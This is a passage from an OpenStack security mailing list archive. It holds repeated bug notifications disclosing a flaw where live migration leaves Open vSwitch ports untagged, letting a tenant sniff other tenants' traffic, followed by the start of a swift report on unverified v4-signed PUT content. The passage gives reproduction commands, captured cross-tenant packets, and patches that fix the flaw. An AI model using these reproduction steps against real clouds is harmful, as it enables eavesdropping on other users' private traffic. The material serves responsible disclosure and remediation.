33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.20, length 28 13:14:32.476015 fa:16:3e:f2:3b:97 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.22, length 28 13:14:32.575034 fa:16:3e:44:fe:35 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.163, length 28 13:14:32.676185 fa:16:3e:1e:92:d7 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.150, length 28 13:14:32.711755 fa:16:3e:99:6c:c8 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 62: vlan 10, p 0, ethertype IPv4, 10.103.12.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 2, prio 49, authtype simple, intvl 1s, length 24 13:14:32.711773 fa:16:3e:f5:23:d5 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 12, p 0, ethertype IPv4, 10.103.15.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 1, prio 49, authtype simple, intvl 1s, length 20 Workaround ---------- We temporary fixed this issue by forcing the dead vlan tag on port creation on compute nodes: /usr/lib/python2.7/site-packages/vif_plug_ovs/linux_net.py: def _create_ovs_vif_cmd(bridge, dev, iface_id, mac,                         instance_id, interface_type=None,                         vhost_server_path=None): + # ODCN: initialize port as dead + # ODCN: TODO: set drop flow     cmd = ['--', '--if-exists', 
'del-port', dev, '--',             'add-port', bridge, dev, + 'tag=4095',             '--', 'set', 'Interface', dev,             'external-ids:iface-id=%s' % iface_id,             'external-ids:iface-status=active',             'external-ids:attached-mac=%s' % mac,             'external-ids:vm-uuid=%s' % instance_id]     if interface_type:         cmd += ['type=%s' % interface_type]     if vhost_server_path:         cmd += ['options:vhost-server-path=%s' % vhost_server_path]     return cmd https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995     def port_dead(self, port, log_errors=True):         '''Once a port has no binding, put it on the "dead vlan".         :param port: an ovs_lib.VifPort object.         '''         # Don't kill a port if it's already dead         cur_tag = self.int_br.db_get_val("Port", port.port_name, "tag",                                          log_errors=log_errors) + # ODCN GM 20170915 + if not cur_tag: + LOG.error('port_dead(): port %s has no tag', port.port_name) + # ODCN AJS 20170915 + if not cur_tag or cur_tag != constants.DEAD_VLAN_TAG: - if cur_tag and cur_tag != constants.DEAD_VLAN_TAG:            LOG.info('port_dead(): put port %s on dead vlan', port.port_name)            self.int_br.set_db_attribute("Port", port.port_name, "tag",                                          constants.DEAD_VLAN_TAG,                                          log_errors=log_errors)             self.int_br.drop_port(in_port=port.ofport) plugins/ml2/drivers/openvswitch/agent/openflow/ovs_ofctl/ovs_bridge.py     def drop_port(self, in_port): + # ODCN AJS 20171004: - self.install_drop(priority=2, in_port=in_port) + self.install_drop(priority=65535, in_port=in_port) Regards, ODC Noord. Gerhard Muntingh Albert Siersema Paul Peereboom To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1734320/+subscriptions From smooney at redhat.com Fri Oct 18 13:27:15 2019 From: smooney at redhat.com (sean mooney) Date: Fri, 18 Oct 2019 13:27:15 -0000 Subject: [Openstack-security] [Bug 1734320] Re: Eavesdropping private traffic References: <151152217834.14483.1577991310209811902.malonedeb@soybean.canonical.com> Message-ID: <157140523587.19842.8709570196447943419.malone@gac.canonical.com> there is a mitagation for this bug in all cases except when the ovs firewall driver is used with kernel ovs. https://review.opendev.org/#/c/631829 has not been reverted and there is no plans to revert it. it. https://review.opendev.org/#/c/612534/ was intoduced to add a config option to enable isolation. https://review.opendev.org/#/c/636061/ allows the caller of os-vif to determin if os-vif should plug the interface to the network backend. the nova change uses that abilty to delegate the plugging to os-vif instead of libvirt https://review.opendev.org/#/c/602432/13/nova/network/os_vif_util.py but we cannot do that until the neutron change is merged https://review.opendev.org/#/c/640258 i am not really activly workign on either patch right now. i tried to repoduce the dvr failutre locally but in my env it seams to work fine. we know from the upstream testing that in a non dvr env this seams to work fine. if some neutron dvr folks can try and fix the dvr issue that woudl move things forward but a few neutorn review have looked and we are not sure why this is broken. 
i think the issue is here https://review.opendev.org/#/c/640258/15/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_dvr_neutron_agent.py at 404 we are not looking at the correct field however i have not had tiem to actully debug this as i have been working on other issue. so to summarize the status form an os-vif point of view i consider this bug to be fixed. the nova fix is currently blocked by dvr support in the neutron patch. if you are using a configuration other than kernel ovs with the ovs firewall driver we believe this bug is fixed. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1734320 Title: Eavesdropping private traffic Status in neutron: Fix Committed Status in OpenStack Compute (nova): In Progress Status in os-vif: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Eavesdropping private traffic ============================= Abstract -------- We've discovered a security issue that allows end users within their own private network to receive from, and send traffic to, other private networks on the same compute node. Description ----------- During live-migration there is a small time window where the ports of instances are untagged. Instances have a port trunked to the integration bridge and receive 802.1Q tagged private traffic from other tenants. If the port is administratively down during live migration, the port will remain in trunk mode indefinitely. Traffic is possible between ports is that are administratively down, even between tenants self-service networks. Conditions ---------- The following conditions are necessary. * Openvswitch Self-service networks * An Openstack administrator or an automated process needs to schedule a Live migration We tested this on newton. Issues ------ This outcome is the result of multiple independent issues. We will list the most important first, and follow with bugs that create a fragile situation. Issue #1 Initially creating a trunk port When the port is initially created, it is in trunk mode. This creates a fail-open situation. See: https://github.com/openstack/os-vif/blob/newton-eol/vif_plug_ovs/linux_net.py#L52 Recommendation: create ports in the port_dead state, don't leave it dangling in trunk-mode. Add a drop-flow initially. Issue #2 Order of creation. The instance is actually migrated before the (networking) configuration is completed. Recommendation: wait with finishing the live migration until the underlying configuration has been applied completely. Issue #3 Not closing the port when it is down. Neutron calls the port_dead function to ensure the port is down. It sets the tag to 4095 and adds a "drop" flow if (and only if) there is already another tag on the port. The port_dead function will keep untagged ports untagged. https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995 Recommendation: Make port_dead also shut the port if no tag is found. Log a warning if this happens. Issue #4 Putting the port administratively down actually puts the port on a compute node shared vlan Instances from different projects on different private networks can talk to each other if they put their ports down. The code does install an openflow "drop" rule but it has a lower priority (2) than the allow rules. 
Recommendation: Increase the port_dead openflow drop rule priority to MAX Timeline --------  2017-09-14 Discovery eavesdropping issue  2017-09-15 Verify workaround.  2017-10-04 Discovery port-down-traffic issue  2017-11-24 Vendor Disclosure to Openstack Steps to reproduce ------------------ 1. Attach an instance to two networks: admin$ openstack server create --nic net-id= --nic net-id = --image --flavor instance_temp 2. Attach a FIP to the instance to be able to log in to this instance 3. Verify: admin$ openstack server show -c name -c addresses fe28a2ee-098f-4425 -9d3c-8e2cd383547d +-----------+-----------------------------------------------------------------------------+ | Field | Value | +-----------+-----------------------------------------------------------------------------+ | addresses | network1=192.168.99.8, ; network2=192.168.80.14 | | name | instance_temp | +-----------+-----------------------------------------------------------------------------+ 4. Ssh to the instance using network1 and run a tcpdump on the other port network2 [root at instance_temp]$ tcpdump -eeenni eth1 5. Get port-id of network2 admin$ nova interface-list fe28a2ee-098f-4425-9d3c-8e2cd383547d +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | Port State | Port ID | Net ID | IP addresses | MAC Addr | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | ACTIVE | a848520b-0814-4030-bb48-49e4b5cf8160 | d69028f7-9558-4f14-8ce6-29cb8f1c19cd | 192.168.80.14 | fa:16:3e:2d:8b:7b | | ACTIVE | fad148ca-cf7a-4839-aac3-a2cd8d1d2260 | d22c22ae-0a42-4e3b-8144-f28534c3439a | 192.168.99.8 | fa:16:3e:60:2c:fa | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ 6. Force port down on network 2 admin$ neutron port-update a848520b-0814-4030-bb48-49e4b5cf8160 --admin-state-up False 7. Port gets tagged with vlan 4095, the dead vlan tag, which is normal: compute1# grep a848520b-0814-4030-bb48-49e4b5cf8160 /var/log/neutron/neutron-openvswitch-agent.log | tail -1 INFO neutron.plugins.ml2.drivers.openvswitch.agent.ovs_neutron_agent [req-e008feb3-8a35-4c97-adac-b48ff88165b2 - - - - -] VIF port: a848520b-0814-4030-bb48-49e4b5cf8160 admin state up disabled, putting on the dead VLAN 8. Verify the port is tagged with vlan 4095 compute1# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           tag: 4095           Interface "qvoa848520b-08" 9. Now live-migrate the instance: admin# nova live-migration fe28a2ee-098f-4425-9d3c-8e2cd383547d 10. Verify the tag is gone on compute2, and take a deep breath compute2# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           Interface "qvoa848520b-08"       Port... compute2# echo "Wut!" 11. 
Now traffic of all other self-service networks present on compute2 can be sniffed from instance_temp [root at instance_temp] tcpdump -eenni eth1 13:14:31.748266 fa:16:3e:6a:17:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.152, length 28 13:14:31.804573 fa:16:3e:e8:a2:d2 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.70, length 28 13:14:31.810482 fa:16:3e:95:ca:3a > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.154, length 28 13:14:31.977820 fa:16:3e:6f:f4:9b > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.150, length 28 13:14:31.979590 fa:16:3e:0f:3d:cc > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 9, p 0, ethertype ARP, Request who-has 10.103.9.163 tell 10.103.9.1, length 28 13:14:32.048082 fa:16:3e:65:64:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.101, length 28 13:14:32.127400 fa:16:3e:30:cb:b5 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.165, length 28 13:14:32.141982 fa:16:3e:96:cd:b0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.100, length 28 13:14:32.205327 fa:16:3e:a2:0b:76 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.153, length 28 13:14:32.444142 fa:16:3e:1f:db:ed > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 72, p 0, ethertype IPv4, 192.168.99.212 > 224.0.0.18: VRRPv2, Advertisement, vrid 50, prio 103, authtype none, intvl 1s, length 20 13:14:32.449497 fa:16:3e:1c:24:c0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.20, length 28 13:14:32.476015 fa:16:3e:f2:3b:97 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.22, length 28 13:14:32.575034 fa:16:3e:44:fe:35 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.163, length 28 13:14:32.676185 fa:16:3e:1e:92:d7 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.150, length 28 13:14:32.711755 fa:16:3e:99:6c:c8 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 62: vlan 10, p 0, ethertype IPv4, 10.103.12.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 2, prio 49, authtype simple, intvl 1s, length 24 13:14:32.711773 fa:16:3e:f5:23:d5 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 12, p 0, ethertype IPv4, 10.103.15.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 1, prio 49, authtype simple, intvl 1s, length 20 Workaround ---------- We temporary fixed this issue by forcing the dead vlan tag on port creation on compute nodes: /usr/lib/python2.7/site-packages/vif_plug_ovs/linux_net.py: def _create_ovs_vif_cmd(bridge, dev, iface_id, mac,                         instance_id, interface_type=None,                         vhost_server_path=None): + # ODCN: initialize port as dead + # ODCN: TODO: set drop flow     cmd = ['--', '--if-exists', 
'del-port', dev, '--',             'add-port', bridge, dev, + 'tag=4095',             '--', 'set', 'Interface', dev,             'external-ids:iface-id=%s' % iface_id,             'external-ids:iface-status=active',             'external-ids:attached-mac=%s' % mac,             'external-ids:vm-uuid=%s' % instance_id]     if interface_type:         cmd += ['type=%s' % interface_type]     if vhost_server_path:         cmd += ['options:vhost-server-path=%s' % vhost_server_path]     return cmd https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995     def port_dead(self, port, log_errors=True):         '''Once a port has no binding, put it on the "dead vlan".         :param port: an ovs_lib.VifPort object.         '''         # Don't kill a port if it's already dead         cur_tag = self.int_br.db_get_val("Port", port.port_name, "tag",                                          log_errors=log_errors) + # ODCN GM 20170915 + if not cur_tag: + LOG.error('port_dead(): port %s has no tag', port.port_name) + # ODCN AJS 20170915 + if not cur_tag or cur_tag != constants.DEAD_VLAN_TAG: - if cur_tag and cur_tag != constants.DEAD_VLAN_TAG:            LOG.info('port_dead(): put port %s on dead vlan', port.port_name)            self.int_br.set_db_attribute("Port", port.port_name, "tag",                                          constants.DEAD_VLAN_TAG,                                          log_errors=log_errors)             self.int_br.drop_port(in_port=port.ofport) plugins/ml2/drivers/openvswitch/agent/openflow/ovs_ofctl/ovs_bridge.py     def drop_port(self, in_port): + # ODCN AJS 20171004: - self.install_drop(priority=2, in_port=in_port) + self.install_drop(priority=65535, in_port=in_port) Regards, ODC Noord. Gerhard Muntingh Albert Siersema Paul Peereboom To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1734320/+subscriptions From 1734320 at bugs.launchpad.net Fri Oct 18 14:33:54 2019 From: 1734320 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 18 Oct 2019 14:33:54 -0000 Subject: [Openstack-security] [Bug 1734320] Re: Eavesdropping private traffic References: <151152217834.14483.1577991310209811902.malonedeb@soybean.canonical.com> Message-ID: <157140923498.22358.18360929861738683954.malone@wampee.canonical.com> Reviewed: https://review.opendev.org/686346 Committed: https://git.openstack.org/cgit/openstack/neutron/commit/?id=9b0919e64809729f4c0186e9be63b1082510bbb1 Submitter: Zuul Branch: stable/queens commit 9b0919e64809729f4c0186e9be63b1082510bbb1 Author: Sean Mooney Date: Thu Nov 8 16:07:55 2018 +0000 raise priority of dead vlan drop - This change adds a max priority flow to drop all traffic that is associated with the DEAD VLAN 4095. - This change is part of a partial mitigation of bug 1734320. Without this change vlan 4095 traffic will be dropped via a low priority flow after being processed by part/all of the openflow pipeline. By raising the priorty and droping in table 0 we drop invalid packets as soon as they enter the pipeline. Conflicts: neutron/tests/unit/plugins/ml2/drivers/openvswitch/agent/openflow/native/test_br_int.py Change-Id: I3482c7c4f00942828cc9396cd2f3d646c9e8c9d1 Partial-Bug: #1734320 (cherry picked from commit e3dc447b908f57e9acc0378111b8e09cbd88ddc5) ** Tags added: in-stable-queens -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. 
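The priority argument in the backported commit above (and in the reporters' workaround, which bumps the drop rule from priority 2 to 65535) can be made concrete with a toy model of OpenFlow matching, where the highest-priority matching flow wins. This is an illustration only, not neutron or OVS code:

    # Among matching flows in a table, OpenFlow applies the one with the
    # highest priority. A drop rule at priority 2 loses to ordinary
    # forwarding rules; a drop rule at 65535 always wins.

    def winning_action(flows):
        return max(flows, key=lambda f: f['priority'])['action']

    allow_rules = [{'priority': 4, 'action': 'forward'},
                   {'priority': 3, 'action': 'forward'}]

    weak_drop = {'priority': 2, 'action': 'drop'}        # original behaviour
    strong_drop = {'priority': 65535, 'action': 'drop'}  # workaround / fix

    print(winning_action(allow_rules + [weak_drop]))     # forward -> traffic leaks
    print(winning_action(allow_rules + [strong_drop]))   # drop    -> port isolated

By installing the max-priority drop for the dead VLAN in table 0, packets tagged 4095 are discarded as soon as they enter the pipeline, before any later allow rules can apply.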
https://bugs.launchpad.net/bugs/1734320 Title: Eavesdropping private traffic Status in neutron: Fix Committed Status in OpenStack Compute (nova): In Progress Status in os-vif: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Eavesdropping private traffic ============================= Abstract -------- We've discovered a security issue that allows end users within their own private network to receive from, and send traffic to, other private networks on the same compute node. Description ----------- During live-migration there is a small time window where the ports of instances are untagged. Instances have a port trunked to the integration bridge and receive 802.1Q tagged private traffic from other tenants. If the port is administratively down during live migration, the port will remain in trunk mode indefinitely. Traffic is possible between ports is that are administratively down, even between tenants self-service networks. Conditions ---------- The following conditions are necessary. * Openvswitch Self-service networks * An Openstack administrator or an automated process needs to schedule a Live migration We tested this on newton. Issues ------ This outcome is the result of multiple independent issues. We will list the most important first, and follow with bugs that create a fragile situation. Issue #1 Initially creating a trunk port When the port is initially created, it is in trunk mode. This creates a fail-open situation. See: https://github.com/openstack/os-vif/blob/newton-eol/vif_plug_ovs/linux_net.py#L52 Recommendation: create ports in the port_dead state, don't leave it dangling in trunk-mode. Add a drop-flow initially. Issue #2 Order of creation. The instance is actually migrated before the (networking) configuration is completed. Recommendation: wait with finishing the live migration until the underlying configuration has been applied completely. Issue #3 Not closing the port when it is down. Neutron calls the port_dead function to ensure the port is down. It sets the tag to 4095 and adds a "drop" flow if (and only if) there is already another tag on the port. The port_dead function will keep untagged ports untagged. https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995 Recommendation: Make port_dead also shut the port if no tag is found. Log a warning if this happens. Issue #4 Putting the port administratively down actually puts the port on a compute node shared vlan Instances from different projects on different private networks can talk to each other if they put their ports down. The code does install an openflow "drop" rule but it has a lower priority (2) than the allow rules. Recommendation: Increase the port_dead openflow drop rule priority to MAX Timeline --------  2017-09-14 Discovery eavesdropping issue  2017-09-15 Verify workaround.  2017-10-04 Discovery port-down-traffic issue  2017-11-24 Vendor Disclosure to Openstack Steps to reproduce ------------------ 1. Attach an instance to two networks: admin$ openstack server create --nic net-id= --nic net-id = --image --flavor instance_temp 2. Attach a FIP to the instance to be able to log in to this instance 3. 
Verify: admin$ openstack server show -c name -c addresses fe28a2ee-098f-4425 -9d3c-8e2cd383547d +-----------+-----------------------------------------------------------------------------+ | Field | Value | +-----------+-----------------------------------------------------------------------------+ | addresses | network1=192.168.99.8, ; network2=192.168.80.14 | | name | instance_temp | +-----------+-----------------------------------------------------------------------------+ 4. Ssh to the instance using network1 and run a tcpdump on the other port network2 [root at instance_temp]$ tcpdump -eeenni eth1 5. Get port-id of network2 admin$ nova interface-list fe28a2ee-098f-4425-9d3c-8e2cd383547d +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | Port State | Port ID | Net ID | IP addresses | MAC Addr | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | ACTIVE | a848520b-0814-4030-bb48-49e4b5cf8160 | d69028f7-9558-4f14-8ce6-29cb8f1c19cd | 192.168.80.14 | fa:16:3e:2d:8b:7b | | ACTIVE | fad148ca-cf7a-4839-aac3-a2cd8d1d2260 | d22c22ae-0a42-4e3b-8144-f28534c3439a | 192.168.99.8 | fa:16:3e:60:2c:fa | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ 6. Force port down on network 2 admin$ neutron port-update a848520b-0814-4030-bb48-49e4b5cf8160 --admin-state-up False 7. Port gets tagged with vlan 4095, the dead vlan tag, which is normal: compute1# grep a848520b-0814-4030-bb48-49e4b5cf8160 /var/log/neutron/neutron-openvswitch-agent.log | tail -1 INFO neutron.plugins.ml2.drivers.openvswitch.agent.ovs_neutron_agent [req-e008feb3-8a35-4c97-adac-b48ff88165b2 - - - - -] VIF port: a848520b-0814-4030-bb48-49e4b5cf8160 admin state up disabled, putting on the dead VLAN 8. Verify the port is tagged with vlan 4095 compute1# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           tag: 4095           Interface "qvoa848520b-08" 9. Now live-migrate the instance: admin# nova live-migration fe28a2ee-098f-4425-9d3c-8e2cd383547d 10. Verify the tag is gone on compute2, and take a deep breath compute2# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           Interface "qvoa848520b-08"       Port... compute2# echo "Wut!" 11. 
Now traffic of all other self-service networks present on compute2 can be sniffed from instance_temp [root at instance_temp] tcpdump -eenni eth1 13:14:31.748266 fa:16:3e:6a:17:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.152, length 28 13:14:31.804573 fa:16:3e:e8:a2:d2 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.70, length 28 13:14:31.810482 fa:16:3e:95:ca:3a > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.154, length 28 13:14:31.977820 fa:16:3e:6f:f4:9b > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.150, length 28 13:14:31.979590 fa:16:3e:0f:3d:cc > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 9, p 0, ethertype ARP, Request who-has 10.103.9.163 tell 10.103.9.1, length 28 13:14:32.048082 fa:16:3e:65:64:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.101, length 28 13:14:32.127400 fa:16:3e:30:cb:b5 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.165, length 28 13:14:32.141982 fa:16:3e:96:cd:b0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.100, length 28 13:14:32.205327 fa:16:3e:a2:0b:76 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.153, length 28 13:14:32.444142 fa:16:3e:1f:db:ed > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 72, p 0, ethertype IPv4, 192.168.99.212 > 224.0.0.18: VRRPv2, Advertisement, vrid 50, prio 103, authtype none, intvl 1s, length 20 13:14:32.449497 fa:16:3e:1c:24:c0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.20, length 28 13:14:32.476015 fa:16:3e:f2:3b:97 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.22, length 28 13:14:32.575034 fa:16:3e:44:fe:35 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.163, length 28 13:14:32.676185 fa:16:3e:1e:92:d7 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.150, length 28 13:14:32.711755 fa:16:3e:99:6c:c8 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 62: vlan 10, p 0, ethertype IPv4, 10.103.12.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 2, prio 49, authtype simple, intvl 1s, length 24 13:14:32.711773 fa:16:3e:f5:23:d5 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 12, p 0, ethertype IPv4, 10.103.15.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 1, prio 49, authtype simple, intvl 1s, length 20 Workaround ---------- We temporary fixed this issue by forcing the dead vlan tag on port creation on compute nodes: /usr/lib/python2.7/site-packages/vif_plug_ovs/linux_net.py: def _create_ovs_vif_cmd(bridge, dev, iface_id, mac,                         instance_id, interface_type=None,                         vhost_server_path=None): + # ODCN: initialize port as dead + # ODCN: TODO: set drop flow     cmd = ['--', '--if-exists', 
'del-port', dev, '--',             'add-port', bridge, dev, + 'tag=4095',             '--', 'set', 'Interface', dev,             'external-ids:iface-id=%s' % iface_id,             'external-ids:iface-status=active',             'external-ids:attached-mac=%s' % mac,             'external-ids:vm-uuid=%s' % instance_id]     if interface_type:         cmd += ['type=%s' % interface_type]     if vhost_server_path:         cmd += ['options:vhost-server-path=%s' % vhost_server_path]     return cmd https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995     def port_dead(self, port, log_errors=True):         '''Once a port has no binding, put it on the "dead vlan".         :param port: an ovs_lib.VifPort object.         '''         # Don't kill a port if it's already dead         cur_tag = self.int_br.db_get_val("Port", port.port_name, "tag",                                          log_errors=log_errors) + # ODCN GM 20170915 + if not cur_tag: + LOG.error('port_dead(): port %s has no tag', port.port_name) + # ODCN AJS 20170915 + if not cur_tag or cur_tag != constants.DEAD_VLAN_TAG: - if cur_tag and cur_tag != constants.DEAD_VLAN_TAG:            LOG.info('port_dead(): put port %s on dead vlan', port.port_name)            self.int_br.set_db_attribute("Port", port.port_name, "tag",                                          constants.DEAD_VLAN_TAG,                                          log_errors=log_errors)             self.int_br.drop_port(in_port=port.ofport) plugins/ml2/drivers/openvswitch/agent/openflow/ovs_ofctl/ovs_bridge.py     def drop_port(self, in_port): + # ODCN AJS 20171004: - self.install_drop(priority=2, in_port=in_port) + self.install_drop(priority=65535, in_port=in_port) Regards, ODC Noord. Gerhard Muntingh Albert Siersema Paul Peereboom To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1734320/+subscriptions From 1765834 at bugs.launchpad.net Mon Oct 21 21:59:24 2019 From: 1765834 at bugs.launchpad.net (OpenStack Infra) Date: Mon, 21 Oct 2019 21:59:24 -0000 Subject: [Openstack-security] [Bug 1765834] Fix proposed to swift (stable/rocky) References: <152425525840.12613.15760107536105434168.malonedeb@gac.canonical.com> Message-ID: <157169516412.9763.3447243012849909843.malone@soybean.canonical.com> Fix proposed to branch: stable/rocky Review: https://review.opendev.org/689883 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1765834 Title: Need to verify content of v4-signed PUTs Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Object Storage (swift): Fix Released Status in Swift3: New Bug description: When we added support for v4 signatures, we (correctly) require that the client provide a X-Amz-Content-SHA256 header and use it in computing the expected signature. However, we never verify that the content sent actually matches the SHA! As a result, an attacker that manages to capture the headers for a PUT request has a 5-minute window to overwrite the object with arbitrary content of the same length: [11:50:08] $ echo 'GOOD' > good.txt [11:50:12] $ echo 'BAD!' 
> bad.txt [11:50:36] $ s3cmd put --debug good.txt s3://bucket DEBUG: s3cmd version 1.6.1 DEBUG: ConfigParser: Reading file '/Users/tburke/.s3cfg' DEBUG: ConfigParser: access_key->te...8_chars...r DEBUG: ConfigParser: secret_key->te...4_chars...g DEBUG: ConfigParser: host_base->saio:8080 DEBUG: ConfigParser: host_bucket->saio:8080 DEBUG: ConfigParser: use_https->False DEBUG: Updating Config.Config cache_file -> DEBUG: Updating Config.Config follow_symlinks -> False DEBUG: Updating Config.Config verbosity -> 10 DEBUG: Unicodising 'put' using UTF-8 DEBUG: Unicodising 'good.txt' using UTF-8 DEBUG: Unicodising 's3://bucket' using UTF-8 DEBUG: Command: put DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Compiling list of local files... DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Unicodising '' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Applying --exclude/--include DEBUG: CHECK: good.txt DEBUG: PASS: u'good.txt' INFO: Running stat() and reading/calculating MD5 values on 1 files, this may take some time... DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: doing file I/O to read md5 of good.txt DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Summary: 1 local files to upload DEBUG: attr_header: {'x-amz-meta-s3cmd-attrs': 